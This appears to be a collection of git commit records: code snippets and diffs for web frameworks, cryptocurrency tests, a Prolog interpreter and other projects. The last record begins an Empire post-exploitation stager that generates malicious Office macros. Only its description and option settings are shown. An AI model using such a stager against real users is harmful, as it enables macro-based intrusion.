xFilesFactor = options.get('xfilesfactor')
aggregationMethod = options.get('aggregationmethod')
try:
if xFilesFactor is not None:
xFilesFactor = float(xFilesFactor)
if not 0 <= xFilesFactor <= 1:
raise AssertionError("xFilesFactor value out of [0,1] bounds")
if aggregationMethod is not None:
if state.database is not None:
if not aggregationMethod in state.database.aggregationMethods:
raise AssertionError("aggregationMethod not found in state.database.aggregationMethods")
except ValueError:
log.msg("Invalid schemas found in %s." % section)
continue
archives = (xFilesFactor, aggregationMethod)
if pattern:
mySchema = PatternSchema(section, pattern, archives)
else:
log.err("Section missing 'pattern': %s" % section)
continue
schemaList.append(mySchema)
schemaList.append(defaultAggregation)
return schemaList
# default retention for unclassified data (7 days of minutely data)
defaultArchive = Archive(60, 60 * 24 * 7)
defaultSchema = DefaultSchema('default', [defaultArchive])
defaultAggregation = DefaultSchema('default', (None, None))
|
Python
| 0.000001
|
@@ -4058,20 +4058,16 @@
if
-not
aggregat
@@ -4076,16 +4076,20 @@
nMethod
+not
in state
|
b7e1346306465e096f74d4e912d5a29be5ee9e93
|
Remove this todo text.
|
kyoukai/app.py
|
kyoukai/app.py
|
# Somewhere along the line, I had decided that I can't interact with others. That I have no choice but to be alone,
# but I've found a new reason to stay. It's because everyone is alone. Everyone is all alone.
# ~~~
import asyncio
import logging
from asphalt.core import Context
from kyoukai.asphalt import HTTPRequestContext
from kyoukai.blueprint import Blueprint
from werkzeug.exceptions import NotFound, MethodNotAllowed, HTTPException, InternalServerError
from werkzeug.routing import RequestRedirect
from werkzeug.wrappers import Request, Response
class Kyoukai(object):
"""
The Kyoukai type is the main part of your web application. It serves as the main container for your app.
"""
def __init__(self,
application_name: str,
*,
server_name: str = None,
**kwargs):
"""
Create the new app.
:param application_name: The name of this application. This is currently unused.
:param server_name: The server name. This can be None.
"""
self.name = application_name
self.server_name = server_name
# Try and get the loop from the keyword arguments - don't automatically perform `get_event_loop`.
self.loop = kwargs.get("loop")
if not self.loop:
self.loop = asyncio.get_event_loop()
self.logger = logging.getLogger("Kyoukai")
# Create the root blueprint.
self._root_bp = Blueprint(application_name)
@property
def root(self) -> Blueprint:
"""
:return: The root Blueprint for the routing tree.
"""
return self._root_bp
def finalize(self):
"""
Finalizes the app and blueprints.
"""
self.root.finalize()
def log_route(self, request: Request, code: int):
"""
Logs a route invocation.
:param request: The request produced.
:param code: The response code of the route.
"""
fmtted = "{} {} - {}".format(request.method, request.path, code)
self.logger.info(fmtted)
async def handle_httpexception(self, ctx: HTTPRequestContext, exception: HTTPException,
environ: dict = None) -> Response:
"""
Handle a HTTP Exception.
:param ctx: The context of the request.
:param exception: The HTTPException
:param environ: The fake WSGI environment.
:return: A :class:`werkzeug.wrappers.Response` that handles this response.
"""
# Try and load the error handler recursively from the ctx.route.blueprint.
bp = ctx.bp or self.root
error_handler = bp.get_errorhandler(exception)
if not error_handler:
# Try the root Blueprint. This may happen if the blueprint requested isn't registered properly in the
# root, for some reason.
error_handler = self.root.get_errorhandler(exception)
if not error_handler:
# Just return the Exception's get_response.
return exception.get_response(environ=environ)
else:
# Try and invoke the error handler to get the Response.
# Wrap it in the try/except, so we can handle a default one.
try:
result = await error_handler.invoke(ctx, (exception,))
except HTTPException as e:
# why tho?
result = e.get_response(environ)
except Exception as e:
result = InternalServerError.wrap(e).get_response(environ)
return result
async def process_request(self, request: Request, parent_context: Context) -> Response:
"""
Processes a Request and returns a Response object.
This is the main processing method of Kyoukai, and is meant to be used by one of the HTTP server backends,
and not by client code.
:param request:
The :class:`werkzeug.wrappers.Request` object to process.
A new HTTPContext will be provided to wrap this request inside of to client code.
:param parent_context:
The :class:`asphalt.core.Context` that is the parent context for this particular app. It will be used as
the parent for the HTTPRequestContext.
:return: A :class:`werkzeug.wrappers.Response` object that can be written to the client as a response.
"""
# Create a new HTTPRequestContext.
ctx = HTTPRequestContext(parent_context, request)
ctx.app = self
async with ctx:
# Call match on our Blueprint to find the request.
# TODO: ERROR HANDLING
try:
matched, params = self.root.match(request.environ)
except NotFound as e:
# No route matched.
self.log_route(ctx.request, 404)
return await self.handle_httpexception(ctx, e, request.environ)
except MethodNotAllowed as e:
# 405 method not allowed
self.log_route(ctx.request, 405)
return await self.handle_httpexception(ctx, e, request.environ)
except RequestRedirect as e:
# slashes etc
# user code is not allowed to handle this
self.log_route(ctx.request, 301)
return e.get_response(request.environ)
ctx.route = matched
ctx.bp = ctx.route.bp
ctx.route_args = params
result = None
# Invoke the route.
try:
result = await matched.invoke(ctx, params)
except HTTPException as e:
result = await self.handle_httpexception(ctx, e, request.environ)
except Exception as e:
self.logger.error("Unhandled exception in route function")
self.logger.exception(e)
e = InternalServerError.wrap(e)
result = await self.handle_httpexception(ctx, e, request.environ)
finally:
if result:
# edge cases
self.log_route(ctx.request, result.status_code)
# Return the new Response.
return result
|
Python
| 0.000032
|
@@ -4657,43 +4657,8 @@
st.%0A
- # TODO: ERROR HANDLING%0A
|
285d5f43b112354f1d5c05f9dd6b050e30f517e4
|
Remove country=DE parameter
|
geocoder/gisgraphy.py
|
geocoder/gisgraphy.py
|
#!/usr/bin/python
# coding: utf8
from __future__ import absolute_import
import logging
from geocoder.location import BBox
from geocoder.base import OneResult, MultipleResultsQuery
class GisgraphyResult(OneResult):
@property
def lat(self):
return self.raw.get('lat')
@property
def lng(self):
return self.raw.get('lng')
@property
def address(self):
return self.raw.get('formatedFull', '')
@property
def country(self):
return self.raw.get('countryCode', '')
@property
def state(self):
return self.raw.get('state', '')
@property
def city(self):
return self.raw.get('city', '')
@property
def street(self):
return self.raw.get('streetName', '')
@property
def housenumber(self):
return self.raw.get('houseNumber', '')
@property
def postal(self):
return self.raw.get('zipCode', '')
class GisgraphyQuery(MultipleResultsQuery):
"""
Gisgraphy REST API
=======================
API Reference
-------------
http://www.gisgraphy.com/documentation/api/
"""
provider = 'gisgraphy'
method = 'geocode'
_URL = 'https://services.gisgraphy.com/geocoding/'
_RESULT_CLASS = GisgraphyResult
_KEY_MANDATORY = False
def _build_params(self, location, provider_key, **kwargs):
return {
'address': location,
'to': kwargs.get('maxRows', 1),
'format': 'json',
'country': 'DE',
}
def _adapt_results(self, json_response):
return json_response['result']
if __name__ == '__main__':
logging.basicConfig(level=logging.INFO)
g = GisgraphyQuery('Ottawa Ontario', maxRows=3)
g.debug()
|
Python
| 0.00039
|
@@ -1495,37 +1495,8 @@
n',%0A
- 'country': 'DE',%0A
|
9f725eae63a7851498a82d3bc06414dc788c0ed7
|
Update comment style in admin.py
|
impersonate/admin.py
|
impersonate/admin.py
|
# -*- coding: utf-8 -*-
'''Admin models for impersonate app.'''
import logging
from django.conf import settings
from django.contrib import admin
from .models import ImpersonationLog
logger = logging.getLogger(__name__)
MAX_FILTER_SIZE = getattr(settings, 'IMPERSONATE_MAX_FILTER_SIZE', 100)
def friendly_name(user):
'''Return proper name if exists, else username.'''
if user.get_full_name() != '':
return user.get_full_name()
else:
return user.username
class SessionStateFilter(admin.SimpleListFilter):
'''Custom admin filter based on the session state.
Provides two filter values - 'complete' and 'incomplete'. A session
that has no session_ended_at timestamp is considered incomplete. This
field is set from the session_end signal receiver.
'''
title = 'session state'
parameter_name = 'session'
def lookups(self, request, model_admin):
return (
('incomplete', "Incomplete"),
('complete', "Complete")
)
def queryset(self, request, queryset):
if self.value() == 'incomplete':
return queryset.filter(session_ended_at__isnull=True)
if self.value() == 'complete':
return queryset.filter(session_ended_at__isnull=False)
else:
return queryset
class ImpersonatorFilter(admin.SimpleListFilter):
'''Custom admin filter based on the impersonator.
Provides a set of users who have impersonated at some point. It is
assumed that this is a small list of users - a subset of staff and
superusers. There is no corresponding filter for users who have been
impersonated, as this could be a very large set of users.
If the number of unique impersonators exceeds MAX_FILTER_SIZE, then
the filter is removed (shows only 'All').
'''
title = 'impersonator'
parameter_name = 'impersonator'
def lookups(self, request, model_admin):
'''Return list of unique users who have been an impersonator.'''
# the queryset containing the ImpersonationLog objects
qs = model_admin.get_queryset(request).order_by('impersonator__first_name')
# dedupe the impersonators
impersonators = set([q.impersonator for q in qs])
if len(impersonators) > MAX_FILTER_SIZE:
logger.debug(
"Hiding admin list filter as number of impersonators "
"exceeds MAX_FILTER_SIZE [%s]",
len(impersonators),
MAX_FILTER_SIZE
)
return
for i in impersonators:
yield (i.id, friendly_name(i))
def queryset(self, request, queryset):
if self.value() in (None, ''):
return queryset
else:
return queryset.filter(impersonator_id=self.value())
class ImpersonationLogAdmin(admin.ModelAdmin):
list_display = (
'impersonator_',
'impersonating_',
'session_key',
'session_started_at',
'duration'
)
readonly_fields = (
'impersonator',
'impersonating',
'session_key',
'session_started_at',
'session_ended_at',
'duration'
)
list_filter = (SessionStateFilter, ImpersonatorFilter, 'session_started_at')
def impersonator_(self, obj):
return friendly_name(obj.impersonator)
def impersonating_(self, obj):
return friendly_name(obj.impersonating)
admin.site.register(ImpersonationLog, ImpersonationLogAdmin)
|
Python
| 0
|
@@ -533,32 +533,33 @@
ilter):%0A%0A '''
+
Custom admin fil
@@ -591,16 +591,20 @@
state.%0A%0A
+
Prov
@@ -656,16 +656,24 @@
mplete'.
+%0A
A sessi
@@ -674,20 +674,16 @@
session
-%0A
that ha
@@ -716,16 +716,24 @@
stamp is
+%0A
conside
@@ -752,20 +752,16 @@
te. This
-%0A
field i
@@ -770,24 +770,32 @@
set from the
+%0A
session_end
@@ -1392,16 +1392,17 @@
%0A '''
+
Custom a
@@ -1437,24 +1437,28 @@
ersonator.%0A%0A
+
Provides
@@ -1513,18 +1513,22 @@
int.
+%0A
It is
-%0A
ass
@@ -1577,16 +1577,24 @@
a subset
+%0A
of staf
@@ -1598,20 +1598,16 @@
taff and
-%0A
superus
@@ -1643,16 +1643,24 @@
g filter
+%0A
for use
@@ -1675,20 +1675,16 @@
ave been
-%0A
imperso
@@ -1708,16 +1708,24 @@
uld be a
+%0A
very la
@@ -1747,16 +1747,20 @@
s.%0A %0A
+
If t
@@ -1821,17 +1821,21 @@
IZE,
+%0A
then
-%0A
the
|
951214d00e29fff46fe9294dadea1b7587db564f
|
fix dangerous bug about var representation on the console which led to non-backtracked path compression
|
prolog/interpreter/translatedmain.py
|
prolog/interpreter/translatedmain.py
|
import os, sys
from pypy.rlib.parsing.parsing import ParseError
from pypy.rlib.parsing.deterministic import LexerError
from prolog.interpreter.interactive import helptext, StopItNow, \
ContinueContinuation
from prolog.interpreter.parsing import parse_file, get_query_and_vars
from prolog.interpreter.parsing import get_engine
from prolog.interpreter.continuation import Continuation, Engine, DoneContinuation
from prolog.interpreter import error, term
import prolog.interpreter.term
prolog.interpreter.term.DEBUG = False
class ContinueContinuation(Continuation):
def __init__(self, engine, var_to_pos, write):
Continuation.__init__(self, engine, DoneContinuation(engine))
self.var_to_pos = var_to_pos
self.write = write
def activate(self, fcont, heap):
self.write("yes\n")
var_representation(self.var_to_pos, self.engine, self.write)
while 1:
if isinstance(fcont, DoneContinuation):
self.write("\n")
return DoneContinuation(None), fcont, heap
res = getch()
if res in "\r\x04\n":
self.write("\n")
raise StopItNow()
if res in ";nr":
raise error.UnificationFailed
elif res in "h?":
self.write(helptext)
elif res in "p":
var_representation(self.var_to_pos, self.engine, self.write)
else:
self.write('unknown action. press "h" for help\n')
def var_representation(var_to_pos, engine, write):
from prolog.builtin import formatting
f = formatting.TermFormatter(engine, quoted=True, max_depth=20)
for var, real_var in var_to_pos.iteritems():
if var.startswith("_"):
continue
val = f.format(real_var.getvalue(engine.heap))
write("%s = %s\n" % (var, val))
def getch():
line = readline()
return line[0]
def debug(msg):
os.write(2, "debug: " + msg + '\n')
def printmessage(msg):
os.write(1, msg)
def readline():
result = []
while 1:
s = os.read(0, 1)
result.append(s)
if s == "\n":
break
if s == '':
if len(result) > 1:
break
raise SystemExit
return "".join(result)
def run(query, var_to_pos, engine):
from prolog.builtin import formatting
f = formatting.TermFormatter(engine, quoted=True, max_depth=20)
try:
if query is None:
return
engine.run(query, ContinueContinuation(engine, var_to_pos, printmessage))
except error.UnificationFailed:
printmessage("no\n")
except error.UncaughtError, e:
f._make_reverse_op_mapping()
printmessage("ERROR: ")
t = e.term
if isinstance(t, term.Callable):
errorterm = t.argument_at(0)
if isinstance(errorterm, term.Callable):
if errorterm.name() == "instantiation_error":
printmessage("arguments not sufficiently instantiated\n")
return
elif errorterm.name()== "existence_error":
if isinstance(errorterm, term.Callable):
printmessage("Undefined %s: %s\n" % (
f.format(errorterm.argument_at(0)),
f.format(errorterm.argument_at(1))))
return
elif errorterm.name()== "domain_error":
if isinstance(errorterm, term.Callable):
printmessage(
"Domain error: '%s' expected, found '%s'\n" % (
f.format(errorterm.argument_at(0)),
f.format(errorterm.argument_at(1))))
return
elif errorterm.name()== "type_error":
if isinstance(errorterm, term.Callable):
printmessage(
"Type error: '%s' expected, found '%s'\n" % (
f.format(errorterm.argument_at(0)),
f.format(errorterm.argument_at(1))))
return
# except error.UncatchableError, e:
# printmessage("INTERNAL ERROR: %s\n" % (e.message, ))
except StopItNow:
printmessage("yes\n")
def repl(engine):
printmessage("welcome!\n")
while 1:
printmessage(">?- ")
line = readline()
if line == "halt.\n":
break
try:
goals, var_to_pos = engine.parse(line)
except ParseError, exc:
printmessage(exc.nice_error_message("<stdin>", line) + "\n")
continue
except LexerError, exc:
printmessage(exc.nice_error_message("<stdin>") + "\n")
continue
for goal in goals:
run(goal, var_to_pos, engine)
def execute(e, filename):
e.run(term.Callable.build("consult", [term.Callable.build(filename)]))
if __name__ == '__main__':
from sys import argv
e = Engine()
if len(argv) == 2:
execute(e, argv[1])
repl(e)
|
Python
| 0
|
@@ -867,32 +867,38 @@
gine, self.write
+, heap
)%0A while
@@ -1417,16 +1417,22 @@
lf.write
+, heap
)%0A
@@ -1571,24 +1571,30 @@
ngine, write
+, heap
):%0A from
@@ -1837,23 +1837,16 @@
etvalue(
-engine.
heap))%0A
|
6d9efe005e346aaef359f369c89d007da1b83189
|
add more untested changes for slack integration
|
lampeflaske.py
|
lampeflaske.py
|
#!/usr/bin/env python3
import pprint
import os
import lamper
from flask import Flask, request
from flask_api import status
app = Flask(__name__)
@app.route("/", methods=['POST', 'GET'])
def hello():
pprint.pprint(request.form)
if request.form.get('command') != '/lamper':
return "wrong command" , status.HTTP_400_BAD_REQUEST
if request.form.get('team_id') != os.environ['SLACK_TEAMID']:
return "wrong team id" , status.HTTP_403_FORBIDDEN
if request.form.get('token') != os.environ['SLACK_TOKEN']:
return "wrong token", status.HTTP_403_FORBIDDEN
if request.form.get('channel_id') != os.environ['SLACK_CHANNELID']:
return "wrong channel id", status.HTTP_403_FORBIDDEN
if request.form.get('text') not in lamper.colors.keys():
return "wrong color" , status.HTTP_400_BAD_REQUEST
lamper.set_dmx(lamper.colors[request.form.get('text')])
#return "Hello World! " + request.form.get('text')
return """
{
"response_type": "in_channel",
"text": "Light switched to {}",
"attachments": [
{
"text":"Light switched to {}"
}
]
}
""".format(request.form.get('text'))
|
Python
| 0
|
@@ -89,16 +89,25 @@
request
+, jsonify
%0Afrom fl
@@ -977,29 +977,22 @@
r
-eturn %22%22%22
+ = %7B
%0A
-%7B%0A
-%22
+'
resp
@@ -1000,20 +1000,20 @@
nse_type
-%22: %22
+': '
in_chann
@@ -1018,153 +1018,49 @@
nnel
-%22
+'
,%0A
-%22text%22: %22Light switched to %7B%7D%22,%0A %22attachments%22: %5B%0A %7B%0A %22text%22:%22Light switched to %7B%7D%22%0A %7D%0A %5D%0A %7D%0A %22%22%22
+ 'text': 'Light switched to %7B%7D'
.for
@@ -1088,9 +1088,39 @@
'text'))
+,%0A %7D%0A%0A return jsonify(r)
%0A
|
70aab65ba167cfd4e24452ca7dd03fe1cabaf6a1
|
create block on node2
|
test/functional/feature_asset_reorg.py
|
test/functional/feature_asset_reorg.py
|
#!/usr/bin/env python3
# Copyright (c) 2019-2020 The Bitcoin Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
from test_framework.test_framework import SyscoinTestFramework
from test_framework.util import assert_equal, assert_raises_rpc_error, disconnect_nodes, connect_nodes
class AssetReOrgTest(SyscoinTestFramework):
def set_test_params(self):
self.setup_clean_chain = True
self.num_nodes = 3
self.extra_args = [['-assetindex=1'],['-assetindex=1'],['-assetindex=1']]
def run_test(self):
self.nodes[0].generate(1)
self.sync_blocks()
self.nodes[2].generate(200)
self.sync_blocks()
disconnect_nodes(self.nodes[0], 1)
disconnect_nodes(self.nodes[0], 2)
self.basic_asset()
# create fork
self.nodes[0].generate(11)
# won't exist on node 0 because it was created on node 3 and we are disconnected
assert_raises_rpc_error(-20, 'Failed to read from asset DB', self.nodes[0].assetinfo, self.asset)
self.nodes[2].generate(10)
assetInfo = self.nodes[2].assetinfo(self.asset)
assert_equal(assetInfo['asset_guid'], self.asset)
# still won't exist on node 0 yet
assert_raises_rpc_error(-20, 'Failed to read from asset DB', self.nodes[0].assetinfo, self.asset)
# connect and sync to longest chain now which does not include the asset
connect_nodes(self.nodes[0], 1)
connect_nodes(self.nodes[0], 2)
self.sync_blocks()
assert_raises_rpc_error(-20, 'Failed to read from asset DB', self.nodes[0].assetinfo, self.asset)
assert_raises_rpc_error(-20, 'Failed to read from asset DB', self.nodes[1].assetinfo, self.asset)
assert_raises_rpc_error(-20, 'Failed to read from asset DB', self.nodes[2].assetinfo, self.asset)
self.nodes[0].generate(1)
self.sync_blocks()
# asset is there now
assetInfo = self.nodes[0].assetinfo(self.asset)
assert_equal(assetInfo['asset_guid'], self.asset)
assetInfo = self.nodes[1].assetinfo(self.asset)
assert_equal(assetInfo['asset_guid'], self.asset)
assetInfo = self.nodes[2].assetinfo(self.asset)
assert_equal(assetInfo['asset_guid'], self.asset)
def basic_asset(self):
self.asset = self.nodes[2].assetnew('1', 'TST', 'asset description', '0x', 8, '1000', '10000', 31, {})['asset_guid']
if __name__ == '__main__':
AssetReOrgTest().main()
|
Python
| 0.000002
|
@@ -980,17 +980,17 @@
on node
-3
+2
and we
@@ -1907,32 +1907,88 @@
fo, self.asset)%0A
+ # node 2 should have the asset in mempool again%0A
self.nod
@@ -1982,33 +1982,33 @@
self.nodes%5B
-0
+2
%5D.generate(1)%0A
|
1f9dea20b433e5b2a69f348d1a842d71a99bc56e
|
Modify tests
|
tests/chainerx_tests/unit_tests/routines_tests/test_evaluation.py
|
tests/chainerx_tests/unit_tests/routines_tests/test_evaluation.py
|
import chainer
from chainer import functions as F
import numpy
import chainerx
from chainerx_tests import dtype_utils
from chainerx_tests import op_utils
_in_out_eval_dtypes = dtype_utils._permutate_dtype_mapping([
(('float16', 'float16'), 'float16'),
(('float32', 'float32'), 'float32'),
(('float64', 'float64'), 'float64'),
(('float32', 'float16'), 'float32'),
(('float64', 'float16'), 'float64'),
(('float64', 'float32'), 'float64'),
])
class EvalBase(op_utils.ChainerOpTest):
def generate_inputs(self):
x_dtype, t_dtype = self.in_dtypes
y = numpy.random.uniform(-1, 1, self.x_shape).astype(x_dtype)
targ = numpy.random.randint(
3, size=self.t_shape).astype(t_dtype)
return y, targ
def forward_chainerx(self, inputs):
return self.forward_xp(inputs, chainerx)
def forward_chainer(self, inputs):
return self.forward_xp(inputs, F)
def forward_xp(self, inputs, xp):
raise NotImplementedError(
'Op test implementation must override `forward_xp`.')
@op_utils.op_test(['native:0', 'cuda:0'])
@chainer.testing.parameterize(*(
chainer.testing.product([
chainer.testing.from_pytest_parameterize(
'x_shape,t_shape', [
((10, 3), (10,)),
((10, 3, 1), (10,)),
((10, 3, 1, 1), (10,)),
((10, 3, 5), (10, 5)),
((10, 3, 5, 4), (10, 5, 4)),
((10, 3, 5, 4, 1), (10, 5, 4)),
((10, 3, 5, 4, 1, 1), (10, 5, 4))
]),
chainer.testing.from_pytest_parameterize(
'in_dtypes,out_dtype', _in_out_eval_dtypes),
chainer.testing.from_pytest_parameterize(
'ignore_label', [None, 0])
])
))
class TestAccuracy(EvalBase):
def forward_xp(self, inputs, xp):
x, t = inputs
t = t.astype(numpy.int64)
if xp is chainerx:
out = xp.accuracy(x, t, self.ignore_label)
else:
out = xp.accuracy(x, t, self.ignore_label)
return out,
|
Python
| 0.000001
|
@@ -177,45 +177,8 @@
s =
-dtype_utils._permutate_dtype_mapping(
%5B%0A
@@ -189,28 +189,26 @@
'float16', '
-floa
+in
t16'), 'floa
@@ -208,18 +208,18 @@
, 'float
-16
+32
'),%0A
@@ -228,28 +228,26 @@
'float32', '
-floa
+in
t32'), 'floa
@@ -271,20 +271,18 @@
at64', '
-floa
+in
t64'), '
@@ -306,28 +306,26 @@
'float32', '
-floa
+in
t16'), 'floa
@@ -349,20 +349,18 @@
at64', '
-floa
+in
t16'), '
@@ -388,20 +388,18 @@
at64', '
-floa
+in
t32'), '
@@ -410,17 +410,16 @@
t64'),%0A%5D
-)
%0A%0A%0Aclass
@@ -1819,142 +1819,8 @@
uts%0A
- t = t.astype(numpy.int64)%0A if xp is chainerx:%0A out = xp.accuracy(x, t, self.ignore_label)%0A else:%0A
|
8c6ffc4e1ed6b7a7f0c3cd4cd28234541bbf91a0
|
Add test for missing testnet section in conf file
|
test/functional/feature_config_args.py
|
test/functional/feature_config_args.py
|
#!/usr/bin/env python3
# Copyright (c) 2017-2019 The Bitcoin Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
"""Test various command line arguments and configuration file parameters."""
import os
from test_framework.test_framework import BitcoinTestFramework
class ConfArgsTest(BitcoinTestFramework):
def set_test_params(self):
self.setup_clean_chain = True
self.num_nodes = 1
def test_config_file_parser(self):
# Assume node is stopped
inc_conf_file_path = os.path.join(self.nodes[0].datadir, 'include.conf')
with open(os.path.join(self.nodes[0].datadir, 'bitcoin.conf'), 'a', encoding='utf-8') as conf:
conf.write('includeconf={}\n'.format(inc_conf_file_path))
with open(inc_conf_file_path, 'w', encoding='utf-8') as conf:
conf.write('-dash=1\n')
self.nodes[0].assert_start_raises_init_error(expected_msg='Error reading configuration file: parse error on line 1: -dash=1, options in configuration file must be specified without leading -')
with open(inc_conf_file_path, 'w', encoding='utf-8') as conf:
conf.write('nono\n')
self.nodes[0].assert_start_raises_init_error(expected_msg='Error reading configuration file: parse error on line 1: nono, if you intended to specify a negated option, use nono=1 instead')
with open(inc_conf_file_path, 'w', encoding='utf-8') as conf:
conf.write('server=1\nrpcuser=someuser\nrpcpassword=some#pass')
self.nodes[0].assert_start_raises_init_error(expected_msg='Error reading configuration file: parse error on line 3, using # in rpcpassword can be ambiguous and should be avoided')
with open(inc_conf_file_path, 'w', encoding='utf-8') as conf:
conf.write('server=1\nrpcuser=someuser\nmain.rpcpassword=some#pass')
self.nodes[0].assert_start_raises_init_error(expected_msg='Error reading configuration file: parse error on line 3, using # in rpcpassword can be ambiguous and should be avoided')
with open(inc_conf_file_path, 'w', encoding='utf-8') as conf:
conf.write('server=1\nrpcuser=someuser\n[main]\nrpcpassword=some#pass')
self.nodes[0].assert_start_raises_init_error(expected_msg='Error reading configuration file: parse error on line 4, using # in rpcpassword can be ambiguous and should be avoided')
inc_conf_file2_path = os.path.join(self.nodes[0].datadir, 'include2.conf')
with open(os.path.join(self.nodes[0].datadir, 'bitcoin.conf'), 'a', encoding='utf-8') as conf:
conf.write('includeconf={}\n'.format(inc_conf_file2_path))
with open(inc_conf_file_path, 'w', encoding='utf-8') as conf:
conf.write('testnot.datadir=1\n')
with open(inc_conf_file2_path, 'w', encoding='utf-8') as conf:
conf.write('[testnet]\n')
self.restart_node(0)
self.nodes[0].stop_node(expected_stderr='Warning: ' + inc_conf_file_path + ':1 Section [testnot] is not recognized.' + os.linesep + 'Warning: ' + inc_conf_file2_path + ':1 Section [testnet] is not recognized.')
with open(inc_conf_file_path, 'w', encoding='utf-8') as conf:
conf.write('') # clear
with open(inc_conf_file2_path, 'w', encoding='utf-8') as conf:
conf.write('') # clear
def run_test(self):
self.stop_node(0)
self.test_config_file_parser()
# Remove the -datadir argument so it doesn't override the config file
self.nodes[0].args = [arg for arg in self.nodes[0].args if not arg.startswith("-datadir")]
default_data_dir = self.nodes[0].datadir
new_data_dir = os.path.join(default_data_dir, 'newdatadir')
new_data_dir_2 = os.path.join(default_data_dir, 'newdatadir2')
# Check that using -datadir argument on non-existent directory fails
self.nodes[0].datadir = new_data_dir
self.nodes[0].assert_start_raises_init_error(['-datadir=' + new_data_dir], 'Error: Specified data directory "' + new_data_dir + '" does not exist.')
# Check that using non-existent datadir in conf file fails
conf_file = os.path.join(default_data_dir, "peercoin.conf")
# datadir needs to be set before [regtest] section
conf_file_contents = open(conf_file, encoding='utf8').read()
with open(conf_file, 'w', encoding='utf8') as f:
f.write("datadir=" + new_data_dir + "\n")
f.write(conf_file_contents)
# Temporarily disabled, because this test would access the user's home dir (~/.bitcoin)
#self.nodes[0].assert_start_raises_init_error(['-conf=' + conf_file], 'Error reading configuration file: specified data directory "' + new_data_dir + '" does not exist.')
# Create the directory and ensure the config file now works
os.mkdir(new_data_dir)
# Temporarily disabled, because this test would access the user's home dir (~/.bitcoin)
#self.start_node(0, ['-conf='+conf_file, '-wallet=w1'])
#self.stop_node(0)
#assert os.path.exists(os.path.join(new_data_dir, 'regtest', 'blocks'))
#if self.is_wallet_compiled():
#assert os.path.exists(os.path.join(new_data_dir, 'regtest', 'wallets', 'w1'))
# Ensure command line argument overrides datadir in conf
os.mkdir(new_data_dir_2)
self.nodes[0].datadir = new_data_dir_2
self.start_node(0, ['-datadir='+new_data_dir_2, '-conf='+conf_file, '-wallet=w2'])
assert os.path.exists(os.path.join(new_data_dir_2, 'regtest', 'blocks'))
if self.is_wallet_compiled():
assert os.path.exists(os.path.join(new_data_dir_2, 'regtest', 'wallets', 'w2'))
if __name__ == '__main__':
ConfArgsTest().main()
|
Python
| 0
|
@@ -1132,24 +1132,295 @@
eading -')%0A%0A
+ with open(inc_conf_file_path, 'w', encoding='utf8') as conf:%0A conf.write(%22wallet=foo%5Cn%22)%0A self.nodes%5B0%5D.assert_start_raises_init_error(expected_msg='Error: Config setting for -wallet only applied on regtest network when in %5Bregtest%5D section.')%0A%0A
with
|
67adba196ed29a2a17911e154dc814dae89953ec
|
Correct log level choices
|
coalib/parsing/DefaultArgParser.py
|
coalib/parsing/DefaultArgParser.py
|
import argparse
from coalib.misc.i18n import _
default_arg_parser = argparse.ArgumentParser(
formatter_class=argparse.RawDescriptionHelpFormatter,
description=_("coala is a simple COde AnaLysis Application. Its goal is "
"to make static code analysis easy and convenient for all "
"languages."))
default_arg_parser.add_argument('TARGETS',
nargs='*',
help=_("Sections to be executed exclusively."))
default_arg_parser.add_argument('-f',
'--files',
nargs='+',
metavar='FILE',
help=_('Files that should be checked'))
default_arg_parser.add_argument('-b',
'--bears',
nargs='+',
metavar='NAME',
help=_('Names of bears to use'))
BEAR_DIRS_HELP = _('Additional directories where bears may lie')
default_arg_parser.add_argument('-d',
'--bear-dirs',
nargs='+',
metavar='DIR',
help=BEAR_DIRS_HELP)
LOG_TYPE_HELP = _("Type of logging (console or any filename)")
default_arg_parser.add_argument('-l',
'--log-type',
nargs=1,
metavar='ENUM',
help=LOG_TYPE_HELP)
LOG_LEVEL_HELP = _("Enum('ERR','WARN','DEBUG') to set level of log output")
default_arg_parser.add_argument('-L',
'--log-level',
nargs=1,
choices=['ERR', 'WARN', 'DEBUG'],
metavar='ENUM',
help=LOG_LEVEL_HELP)
OUTPUT_HELP = _('Type of output (console or none)')
default_arg_parser.add_argument('-o',
'--output',
nargs=1,
metavar='FILE',
help=OUTPUT_HELP)
CONFIG_HELP = _('Configuration file to be used, defaults to .coafile')
default_arg_parser.add_argument('-c',
'--config',
nargs=1,
metavar='FILE',
help=CONFIG_HELP)
SAVE_HELP = _('Filename of file to be saved to, if provided with no arguments,'
' settings will be stored back to the file given by -c')
default_arg_parser.add_argument('-s',
'--save',
nargs='?',
const=True,
metavar='FILE',
help=SAVE_HELP)
SETTINGS_HELP = _('Arbitrary settings in the form of section.key=value')
default_arg_parser.add_argument('-S',
'--settings',
nargs='+',
metavar='SETTING',
help=SETTINGS_HELP)
JOB_COUNT_HELP = _('Number of processes to be allowed to run at once')
default_arg_parser.add_argument('-j',
'--job-count',
nargs=1,
type=int,
metavar='INT',
help=JOB_COUNT_HELP)
APPLY_HELP = _("Enum('YES','NO','ASK') to set whether to apply changes")
default_arg_parser.add_argument('-a',
'--apply-changes',
nargs=1,
choices=['YES', 'NO', 'ASK'],
metavar='ENUM',
help=APPLY_HELP)
|
Python
| 0
|
@@ -1598,15 +1598,20 @@
'ERR
+OR
','WARN
+ING
','D
@@ -1637,16 +1637,38 @@
of log
+%22%0A %22
output%22)
@@ -1843,16 +1843,18 @@
'ERR
+OR
', 'WARN
', '
@@ -1849,16 +1849,19 @@
', 'WARN
+ING
', 'DEBU
|
72e91e55d62f4fc3e947a37181590a0e31fe5e9b
|
fix LengthOfVari missing error
|
lib/stagers/windows/macro.py
|
lib/stagers/windows/macro.py
|
from lib.common import helpers
import random
import random, string
class Stager:
def __init__(self, mainMenu, params=[]):
self.info = {
'Name': 'Macro',
'Author': ['@enigma0x3', '@harmj0y'],
'Description': ('Generates an office macro for Empire, compatible with office 97-2003, and 2007 file types.'),
'Comments': [
'http://enigma0x3.wordpress.com/2014/01/11/using-a-powershell-payload-in-a-client-side-attack/'
]
}
# any options needed by the stager, settable during runtime
self.options = {
# format:
# value_name : {description, required, default_value}
'Listener' : {
'Description' : 'Listener to generate stager for.',
'Required' : True,
'Value' : ''
},
'Language' : {
'Description' : 'Language of the stager to generate.',
'Required' : True,
'Value' : 'powershell'
},
'StagerRetries' : {
'Description' : 'Times for the stager to retry connecting.',
'Required' : False,
'Value' : '0'
},
'OutFile' : {
'Description' : 'File to output macro to, otherwise displayed on the screen.',
'Required' : False,
